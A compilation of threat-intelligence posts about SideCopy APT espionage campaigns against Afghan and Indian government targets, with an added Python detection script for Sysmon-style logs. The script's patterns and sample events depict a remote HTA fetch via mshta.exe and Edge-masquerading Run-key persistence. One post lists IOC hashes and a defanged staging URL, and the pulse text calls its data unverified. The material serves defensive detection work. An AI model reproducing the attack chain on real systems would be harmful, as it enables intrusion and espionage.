📰 SideCopy APT Targets Afghanistan's Finance Ministry in 'XENOFISCAL' Espionage Campaign

APT group SideCopy targets Afghanistan's Finance Ministry in 'Operation XENOFISCAL.' The campaign uses Pashto-language spear-phishing lures to deploy the XenoRAT trojan for espionage. 🇵🇰-aligned group continues focus on South Asia. #APT #SideCopy #...

🌐 cyber[.]netsecops[.]io

🔗 https://cyber.netsecops.io/articles/sidecopy-apt-targets-afghanistans-finance-ministry-with-xenorat/…

SideCopy Targets Afghan Finance Ministry with Xeno RAT Malware

Seqrite Labs researchers uncovered a sneaky malware attack, dubbed Operation XENOFISCAL, where the Pakistan-aligned SideCopy group targeted Afghanistan's Ministry of Finance and government officials with a cleverly crafted phishing lure written in Pashto. The attack used Xeno RAT Malware, delivered through a ZIP archive with a malicious…

https://osintsights.com/sidecopy-targets-afghan-finance-ministry-with-xeno-rat-malware?utm_source=mastodon&utm_medium=social

#XenoRatMalware #Sidecopy #Afghanistan #FinanceSector #SpearPhishing


Operation XENOFISCAL: SideCopy deploying persistent XenoRAT targeting the MoF, Afghanistan

SideCopy APT, a Pakistan-linked threat group under the Transparent Tribe umbrella, executed a targeted spear phishing campaign against Afghanistan's Ministry of Finance and provincial revenue directorates. The attack begins with a Pashto-language LNK file disguised as a staff directory document, which executes mshta.exe to fetch remote HTA payloads from compromised Afghan education infrastructure. The multi-stage chain deploys obfuscated JavaScript, establishes registry-based persistence mimicking Microsoft Edge, and ultimately delivers XenoRAT 1.8.7 beaconing to bulletproof Bulgarian hosting. The campaign demonstrates precise knowledge of target administrative context, using Dari and Pashto decoy documents listing provincial finance officials with direct contact information. Infrastructure analysis reveals deliberate staging within Afghan government IP space and C2 infrastructure overlapping with previous SideCopy operations.

Pulse ID: 6a196f2fd88de848b913e4da
Pulse Link: https://otx.alienvault.com/pulse/6a196f2fd88de848b913e4da
Pulse Author: AlienVault
Created: 2026-05-29 10:49:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Afghanistan #Bulgaria #CyberSecurity #Edge #Education #Government #InfoSec #Java #JavaScript #LNK #Microsoft #MicrosoftEdge #Mimic #OTX #OpenThreatExchange #Pakistan #Phishing #RAT #SideCopy #SpearPhishing #TransparentTribe #bot #AlienVault

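The pulse above names three observable behaviours in the chain: mshta.exe pulling an HTA from a remote host after the LNK runs, a Run-key entry named to look like Microsoft Edge, and a payload executing from a staging folder. The rules below turn those into host-log triage checks. This is an added example, not code from the pulse, Seqrite or LevelBlue; it assumes Sysmon-style records (EventID 1 = process creation, EventID 13 = registry value set), and the hostname, paths and value names in SAMPLE_EVENTS are constructed for the example, not indicators from the report.

```python
"""Triage rules for the SideCopy-style chain: LNK -> mshta.exe remote HTA ->
Run-key persistence posing as Microsoft Edge -> payload under C:\\Users\\Public.
Added example; the event schema is Sysmon-like and every host, path and value
name in SAMPLE_EVENTS is constructed, not taken from the report."""
import re
from dataclasses import dataclass

# Any http(s) URL on the mshta.exe command line means the HTA is fetched remotely.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Per-user or per-machine autostart values (Run and RunOnce).
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.IGNORECASE)
# Where genuine msedge.exe lives; anything else using the Edge name is suspect.
LEGIT_EDGE = re.compile(
    r'^"?C:\\Program Files( \(x86\))?\\Microsoft\\Edge\\Application\\msedge\.exe',
    re.IGNORECASE,
)
# World-writable folder used as a staging directory (assumed pattern).
PUBLIC_DIR = re.compile(r"^C:\\Users\\Public\\", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    event: dict


def check_process(ev):
    """Rules for a process-creation record."""
    findings = []
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    if image.lower().endswith("\\mshta.exe") and REMOTE_URL.search(cmd):
        findings.append(Finding("mshta_remote_hta", ev))
    if PUBLIC_DIR.match(image):
        findings.append(Finding("exec_from_users_public", ev))
    return findings


def check_registry(ev):
    """Rule for a registry value-set record: a Run entry whose name borrows the
    Edge brand but whose data does not point at the real msedge.exe."""
    target = ev.get("TargetObject", "")
    data = ev.get("Details", "")
    if RUN_KEY.search(target):
        value_name = target.rsplit("\\", 1)[-1]
        if "edge" in value_name.lower() and not LEGIT_EDGE.match(data):
            return [Finding("runkey_edge_masquerade", ev)]
    return []


def scan(events):
    """Run every rule over a list of records; findings come back in event order."""
    out = []
    for ev in events:
        if ev.get("EventID") == 1:
            out.extend(check_process(ev))
        elif ev.get("EventID") == 13:
            out.extend(check_registry(ev))
    return out


# Constructed sample records (hypothetical SID, host and paths).
RUN = "HKU\\S-1-5-21-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
SAMPLE_EVENTS = [
    # LNK double-click: explorer.exe spawns mshta.exe with a remote HTA (hit).
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://edu.example/assets/staff.hta'},
    # Admin running a local HTA: same binary, no remote URL (no hit).
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" C:\Tools\report.hta'},
    # Run value named like Edge but pointing into C:\Users\Public (hit).
    {"EventID": 13, "TargetObject": RUN + "\\MicrosoftEdge",
     "Details": r"C:\Users\Public\Libraries\edge\msedge.exe"},
    # Genuine Edge auto-launch value (no hit).
    {"EventID": 13, "TargetObject": RUN + "\\MicrosoftEdgeAutoLaunch_A1B2",
     "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
    # The staged binary actually running from the public folder (hit).
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\Public\Libraries\edge\msedge.exe",
     "CommandLine": r"C:\Users\Public\Libraries\edge\msedge.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.rule, f.event.get("Image") or f.event.get("TargetObject"))
```

The Edge rule keys on the value data rather than the value name alone because legitimate Edge installs do write Run entries under their own name; what gives the masquerade away is the data pointing somewhere other than the real install path.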

Recorded Future's Insikt Group recently analyzed a Pakistani cyber campaign using a new version of the DRAT remote access trojan, deployed in a TAG-140 campaign overlapping with the #SideCopy (~APT36) attacks targeting Indian government organizations.

🔗 https://www.recordedfuture.com/research/drat-v2-updated-drat-emerges-tag-140s-arsenal

Analysis of TAG-140 Campaign and DRAT V2 Development Targeting Indian Government Organizations

Analysis of the TAG-140 cyber espionage campaign targeting Indian government organizations, focusing on the development and deployment of the modified DRAT V2 remote access trojan.

#APT #Sidecopy

49b29596c81892f8fff321ff8d64105a
DMA_Monthly_Update_Minutes_of_Meeting-reg.zip

a52d2a0edccdc0f533c7b04e88fe8092
DocScanner_Updated_letter.pdf.lnk

hxxps://futureuniform.ca/wp/wp-content/files/01/

d0c80705be2bc778c7030aae1087f96e
main.hta

9f5354dcf6e6b5acd4213d9ff77ce07c
C:\Users\Public\stremoe\steistem.exe

InSideCopy: How this APT continues to evolve its arsenal - By Asheer Malhotra and Justin Thattil.

Cisco Talos is tracking an increase in Sid... http://feedproxy.google.com/~r/feedburner/Talos/~3/7sPQPB7nf_U/sidecopy.html #sidecopy #malware #securex #threats #talos #rats #apt


Cyber espionage campaign against the Indian army uncovered #SideCopy, #APT https://www.securitylab.ru/news/512531.php https://twitter.com/SecurityLabnews/status/1310834200220753921/photo/1

The attackers are of Pakistani origin and are presumably members of the Transparent Tribe APT.